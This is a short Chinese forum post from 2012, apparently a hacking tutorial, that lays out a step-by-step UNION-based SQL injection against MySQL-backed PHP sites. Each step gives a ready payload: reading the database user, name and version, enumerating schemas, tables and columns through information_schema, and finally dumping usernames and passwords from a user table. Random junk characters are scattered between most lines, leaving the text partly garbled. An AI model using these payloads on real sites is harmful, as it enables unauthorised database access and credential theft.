0 g0 S. D* k. a" R2 b M
教程内容:Mysql 5+php 注入! v2 Z: `: ~7 n; ^: @
+ `6 L# f4 T5 g/ g/ O# O* E
9 {4 r7 P, y, ~0 k$ ^
" f/ m0 T& |& V2 U1 C. x+ i一.查看MYSQL基本信息(库名,版本,用户)9 U6 w C+ X7 D* D# V8 O
7 P& v, t2 \$ B
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
8 f, n7 Z2 y9 U5 y5 e* B) m* Q
5 m; ?$ D- i: n; B! c二.查数据库4 |- y& G0 h8 c' o6 d8 P
1 C/ x3 N6 \+ s
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*4 j# h G/ N3 Z: a- q; d! \
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。$ u$ l" d6 _" z* X1 ]0 N
1 L; b( j9 H3 E6 J3 Y9 F
三.暴表
+ G) P; X. k: E/ }8 k% x: o( c2 r) T) l
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*2 G8 \3 Y7 u1 N1 F; @
& J% W6 N% g* s" qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。% D& O: ~9 s+ u) q: P" E
2 u0 F$ u( g) _+ J四.暴字段0 S1 G% f; u: z' n9 K8 X* S
% H7 r/ k( w$ s, T5 `# @/ Y
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*5 r8 i% A1 x& c' e
6 s+ d- q1 y/ b5 M+ m
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。0 D) E6 Y/ K2 n/ k. M: [
& P% V2 |; `( _
五.暴数据
$ k* g4 ]% c# v; E; A: m; P# P
: {5 Y1 J. f6 A9 h6 V9 W/ _% m# U7 vand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/* ~( J& T: b! J: G7 }6 f
1 ^0 j1 r6 w: |* f( S! ?0 \: x
- _% r7 a3 W% b$ T0 u& x+ |这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
/ Q/ N$ p" l1 p( L/ [+ T9 K |
发表于 2012-9-13 16:27:53
收藏
支持
反对